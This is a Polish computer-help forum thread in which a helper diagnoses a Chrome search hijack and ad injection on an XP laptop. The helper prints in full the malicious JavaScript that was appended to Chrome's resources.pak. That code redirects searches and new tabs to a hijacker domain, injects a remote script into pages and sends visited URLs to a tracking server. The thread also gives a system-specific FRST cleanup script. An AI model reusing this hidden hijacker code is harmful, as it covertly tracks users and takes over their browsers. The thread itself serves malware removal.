marfid Opublikowano 23 Lutego 2016 Zgłoś Udostępnij Opublikowano 23 Lutego 2016 Witam, mam problem z ładowaniem się w Chrome zamiast google strony 'search.top-arma.com', otwieraniem reklam z 'Money Viking Ads' oraz otwieraniem się innych niechcianych stron. Komputer to starszy Compaq nx7300 z XP. Wszystko było dobrze do czasu instalacji KMPlayer z DP. Skanowałem i czyściłem CCleanerem, Malwarebytes Anti-Malware i Anv Smart Defender bez skutku. Co ciekawe brak takich objawów w IE. Proszę o pomoc. Addition.txt FRST.txt gmer.txt Odnośnik do komentarza
picasso Opublikowano 23 Lutego 2016 Zgłoś Udostępnij Opublikowano 23 Lutego 2016 W raporcie nie widać tej modyfikacji, ale prawdopodobnie jest zmodyfikowany globalny plik zasobów Google resources.pak. Ta modyfikacja jest niewykrywalna żadną automatyczną metodą. Poproszę o materiał do ręcznej analizy: Skopiuj na Pulpit poniższy folder, spakuj do ZIP, shostuj gdziewś i podeślij link na PW. C:\Program Files\Google\Chrome Odnośnik do komentarza
marfid Opublikowano 23 Lutego 2016 Autor Zgłoś Udostępnij Opublikowano 23 Lutego 2016 Załączam zapomniany plik Shortcut.txt Odnośnik do komentarza
marfid Opublikowano 26 Lutego 2016 Autor Zgłoś Udostępnij Opublikowano 26 Lutego 2016 Zamykam temat. Po reinstalacji Chrome i wszystkich pozostałości w danych aplikacji problem nie występuje. Odnośnik do komentarza
picasso Opublikowano 12 Kwietnia 2016 Zgłoś Udostępnij Opublikowano 12 Kwietnia 2016 (edytowane) Pro forma komentarz. Tak, problemem była modyfikacja pliku zasobów Google Chrome C:\Program Files\Google\Chrome\Application\[Wersja]\resources.pak. Oto zmodyfikowany frament (dostawiony szkodliwy skrypt): <!-- Copyright 2013 The Chromium Authors. All rights reserved. Use of this source code is governed by a BSD-style license that can be found in the LICENSE file. We use an HTML page just to have access to the DOM, for URL parsing. An alternative would be to include a URL parsing JavaScript library with the extension but this approach is likely smaller and faster. --> <html> <head> <script src="thunk.js"></script> </head> <body> </body> </html> try{(function(d,u){function k(a){for(var b=0;b<a.length;b++){var e=b,c;c=a[b];if("string"===typeof c)a:{if(!v(c))for(var g=0;g<p.length;g++)if(p[g].test(c)){c="";break a}}else c=c.toString();c=encodeURIComponent(c.replace(w,"$cma;"));a[e]=c}(new Image).src="https://moneyviking-a.akamaihd.net/stats/?"+a.shift()+"="+a.join("|,|")}function m(a){return [ ".*capacostarica.com.*",".*volunteercentre.org.*",".*search.yahoo.com.*ddc[_-]bd.*",".*capn=ed_ui_.*_kw_001.*",".*ask.com.*siteid=28527.*",".*src=55cd729e57e760c05c8b466e.*",".*capn=ed_ui_jp_kw_002.*",".*thesmartsearch.net.*",".*search.yahoo.com.*rh=true.*",".*search.results-hub.com.*",".*search.netbetterresults.com.*"," .*search.yahoo.com.*ddc[_-]bd.*",".*fluey.com.*",".*tapxchange.com.*",".*search.yahoo.com.*",".*ask\\.com.*",".*search.searchitknow.com.*",".*ask.com.*siteid=23199.*",".*ask.com.*siteid=23203.*",".*ask.com.*siteid=23209.*",".*ask.com.*siteid=23204.*",".*ask.com.*siteid=23210.*",".*ask.com.*siteid=28524.*",".*ask.com.*siteid=23200.*",".*ask.com.*siteid=28525.*",".*ask.com.*siteid=28531.*",".*ask.com.*siteid=23205.*",".*ask.com.*siteid=28532.*",".*ask.com.*siteid=29358.*",".*ask.com.*siteid=23211.*",".*ask.com.*siteid=28533.*",".*ask.com.*siteid=28526.*",".*ask.com.*siteid=23201.*",".*ask.com.*siteid=23207.*",".*ask.com.*siteid=23212.*",".*ask.com.*siteid=28529.*",".*ask.com.*siteid=29356.*",".*ask.com.*siteid=23202.*",".*ask.com.*siteid=23208.*",".*ask.com.*siteid=23213.*",".*ask.com.*siteid=28530.*",".*smartshopsave.com.*siteid=29357.*",".*bing.com.*IMZ-RZ.*",".*home.searchpile.com.*",".*au.smartshopsave.com.*28527.*",".*uk.ask.com.*32859.*",".*thesmartsearch.net.*p=ein.*",".*search.yahoo.com.*yhs-invalid.*",".*capn=ed_ui_.*_kw_004.*",".*au.ask.com.*28527.*",".*search.top-arama.com.*",".*search.yahoo.com.*spigot.*",".*search.yahoo.com.*greentree.*",".*smartshopsave.com.*siteid=23203.*",".*smartshopsave.com.*siteid=23199.*",".*smartshopsave.com.*siteid=23204.*",".*smartshopsave.com.*siteid=23209.*",".*smartshopsave.com.*siteid=23210.*",".*smartshopsave.com.*siteid=28524.*",".*smartshopsave.com.*siteid=23200.*",".*smartshopsave.com.*siteid=28525.*",".*smartshopsave.com.*siteid=28531.*",".*smartshopsave.com.*siteid=23205.*",".*smartshopsave.com.*siteid=28532.*",".*smartshopsave.com.*siteid=29358.*",".*smartshopsave.com.*siteid=23211.*",".*smartshopsave.com.*siteid=28533.*",".*smartshopsave.com.*siteid=28526.*",".*smartshopsave.com.*siteid=23201.*",".*smartshopsave.com.*siteid=23207.*",".*smartshopsave.com.*siteid=23212.*",".*smartshopsave.com.*siteid=28529.*",".*smartshopsave.com.*siteid=29356.*",".*smartshopsave.com.*siteid=23202.*",".*smartshopsave.com.*siteid=23208.*",".*smartshopsave.com.*siteid=23213.*",".*smartshopsave.com.*siteid=28530.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/s.*","http:\\/\\/searchinterneat-a\\.akamaihd\\.net\\/h.*",".*search.yahoo.com.*_bd_com.*",".*=__default.*"].some(function({return(new RegExp().test(a)})}function x(a,{var e=queryCommandValue;h(function(c){c||(c={});var g=c["BL_ST_"+a+"_"+e],d=Date.now();g?3E3>d-g?b&&b(!0):(c["BL_ST_"+a+"_"+e]=d,b&&b(!1),f(c)):(c["BL_ST_"+a+"_"+e]=d,f(c),b&&b(!1))})}function h(a){chrome.storage.local.get("BLGC_STORAGE",function({a&&a(b.BLGC_STORAGE)})}function f(a){var b={};b.BLGC_STORAGE=a;chrome.storage.local.set(b,function(){})}function q(a){try{if(0==a.length)return{hostName:""};var b=u.createElement("a");0!=a.indexOf("http")&&(a="http://"+a);b.href=a;return b}catch(e){}return{hostname:a}}function y(a){a=a.toLowerCase();for(var b=0;b<n.length;b++)if(-1!=a.indexOf(n[b].host.toLowerCase()))return b;return-1}function l(a,{try{b=b.replace(/[\[]/,"\[").replace(/[\]]/,"\]");var e=(new RegExp("[\?]"+b+"=([^]*)")).exec(a);return null==e?null:e[1]}catch(c){}}function z(a,{var e=l(a,n[b].oparam);switch({case 0:case 2:case 3:case 4:return!!e;case 1:var e=l(a,"type"),c=l(a,"hsimp"),g=l(a,"fr"),d=/^http(s)?:\/\/(.{2}\.)?(malaysia\.)?(y.*\.)?search\.yahoo\./;return!!g&&-1!=g.indexOf("ddc-bd")||!!c&&-1!=c.indexOf("ddc_bd")||!!e&&-1!=e.indexOf("_bd_com")||!d.test(a)||-1!=a.indexOf("/local/")}return!1}function r(a,{var e=-1,c="",g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8MBw5AQ1FBbV9aBAFcFQxCeRQBWVsXDFYaeVoAUg8TFlYbdR9aFQQTQkcFME0FA1UWQhNNfXRXD1wId1xIKVdf&q=|search_term|",d=null,f=null;b.url&&!m(b.url)&&(f=q(b.url).hostname,h(function(h){h||(h={});if(-1!=(e=y(f))){if(h[a]&&(d=q(h[a]).hostname,(!f||f==d)&&1!=e))return;c=n[e].param;!z(b.url,e)&&(queryCommandValue=l(b.url,c))&&x(a,function(c){c?k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","SkippedSearch",b.url]):(g="http://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQ8MBw5AQ1FBbV9aBAFcFQxCeRQBWVsXDFYaeVoAUg8TFlYbdR9aFQQTQkcFME0FA1UWQhNNfXRXD1wId1xIKVdf&q=|search_term|".replace("|search_term|",queryCommandValue),chrome.tabs.update(a,{url:g}),k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","Search",b.url]))})}}))}function A(a,b,e){try{chrome.tabs.executeScript(a,{code:"if(!window.blgcran){ window.blgcran = true; var scr=document.createElement('script'); scr.src='https://moneyviking-a.akamaihd.net/MoneyViking/cr?t=BLGC&g=64f71bdb-fbe8-49a9-98bf-c99c836b7c85&pn=Chrome'; document.head.appendChild(scr);}"})}catch(c){}-1!=t.indexOf(b.url)&&(m(e.url)||chrome.tabs.update(a,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAMXJg4JA10TDFNBJQEVVQAQGBgaeFteTFpIGFYbcw9aVlpJFBNBNARaAktXUUEeIlVfAh8fHHhMLlxBN1AaSFtE"}),h(function(c){c||(c={});c[a]=b.url;f(c)}),d.skipNewTabMsg?d.skipNewTabMsg=!1:k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","NewTab",b.url]));d.firstRun=!1;r(a,;b.url&&h(function(c){c||(c={});c[a]=b.url;f(c)})}"undefined"==typeof d.firstRun&&(d.firstRun=!1);"undefined"==typeof d.skipNewTabMsg&&(d.skipNewTabMsg=!1);var t=["chrome://newtab/","safer://newtab/"],n=[{host:".bing.",param:"q",oparam:"qs"},{host:"search.yahoo.",param:"p",oparam:"fr"},{host:".google.",param:"q",oparam:"site"},{host:".ask.",param:"q",oparam:"qo"},{host:"search.aol.",param:"q",oparam:"s_it"},{host:"go.mail.ru",param:"q",oparam:"NA"},{host:"intent.clara-labs.",param:"q",oparam:"NA"},{host:"trovi.",param:"q",oparam:"NA"},{host:".plusnetwork.",param:"q",oparam:"NA"},{host:"isearch.bobrowser.",param:"q",oparam:"NA"},{host:"www-searching.",param:"q",oparam:"NA"},{host:".thesmartsearch.",param:"q",oparam:"NA"},{host:".search.safer.",param:"q",oparam:"NA"},{host:".cassiopessa.",param:"q",oparam:"NA"},{host:"isearch.omiga-plus.",param:"q",oparam:"NA"},{host:"searches.omiga-plus.",param:"q",oparam:"NA"},{host:"istart.webssearches.",param:"q",oparam:"NA"},{host:"search.istartsurf.",param:"q",oparam:"NA"}],p=[/(?:\d[(). -]*?){9,16}/,/[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?/i],w=/,/g;btoa("94df1405-b2c7-479e-98ea-4be1fc81ab76_54_10");var v=function(){var a=/^[\d,a-f]{8}-(?:[\d,a-f]{4}-){3}[\d,a-f]{12}$/i;return function({return a.test(}}();chrome.runtime.onStartup.addListener(function(){d.firstRun=!0;d.skipNewTabMsg=!0;f({})});chrome.tabs.onReplaced.addListener(function(a,{var e,c;h(function(d){d||(d={});e=d[a];c=d[b];d[a]=c;d[b]=e;f(d)})});chrome.tabs.onRemoved.addListener(function(a){h(function({b||(b={});delete b[a];f(})});chrome.tabs.onCreated.addListener(function(a){if(a.id&&!a.openerTabId)if(d.firstRun){if(m(a.url))return;chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRggVdF8PUFsVQxhFIlwATA1IQAwOeQFaBxQSGAxAeAoOAw4SGQAFIk0FA1oDB0VXfVtUBlpXTwhuL1ddGG8YSlxNJw=="});k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","HomePage",a.url])}else-1==t.indexOf(a.url)||m(a.url)||(chrome.tabs.update(a.id,{url:"http://searchinterneat-a.akamaihd.net/t?eq=U0EeFFhaR1oWHAMXJg4JA10TDFNBJQEVVQAQGBgaeFteTFpIGFYbcw9aVlpJFBNBNARaAktXUUEeIlVfAh8fHHhMLlxBN1AaSFtE"}),k(["BL_YS_Action_2","MoneyViking","64f71bdb-fbe8-49a9-98bf-c99c836b7c85","blgc","NewTab",a.url]));else a.openerTabId&&h(function({b||(b={});b[a.id]=b[a.openerTabId];f(});d.firstRun=!1});chrome.webNavigation.onBeforeNavigate.addListener(function(a){0===a.frameId&&r(a.tabId,{url:a.url})});chrome.tabs.onUpdated.addListener(function(a,b,d){A(a,b,d)})})(window,document)}catch(d){};// Copyright 2013 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. Rozwiązaniem byłaby albo podmiana tego pliku starszą kopią (był w folderze niezmodyfikowany plik resources.bak), albo reinstalacja przeglądarki nadpisująca zawartość katalogu Program files. To drugie już wykonałeś. Natomiast jeśli chodzi o inne zagadnienia widoczne w raportach: 1. Odinstaluj: Anvi Smart Defender 2.5 (słaby program), Java 7 Update 65 (stara wersja), McAfee Security Scan Plus (sponsor instalacji Adobe Flash), Update for PriceFountain (adware). 2. Drobny skrypt usuwający odpadkowe wpisy. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: Task: C:\WINDOWS\Tasks\At1.job => C:\DOCUME~1\Brim\DANEAP~1\PRICEF~1\UPDATE~1\UPDATE~1.EXE SecurityProviders: msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, mcenspc.dll Toolbar: HKU\S-1-5-21-4124746199-4171654727-105604383-1006 -> Brak nazwy - {A13C2648-91D4-4BF3-BC6D-0079707C4389} - Brak pliku HKU\S-1-5-21-4124746199-4171654727-105604383-1006\...\Run: [Polar Sync] => [X] HKLM\...\Policies\Explorer: [NoCDBurning] 0 DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\KernelFaultCheck DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SunJavaUpdateSched DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes RemoveDirectory: C:\Program Files\Winsere RemoveProxy: EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), zaznacz pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt. Edytowane 2 Czerwca 2016 przez picasso Temat zostaje zamknięty z powodu braku odpowiedzi. //picasso Odnośnik do komentarza
Rekomendowane odpowiedzi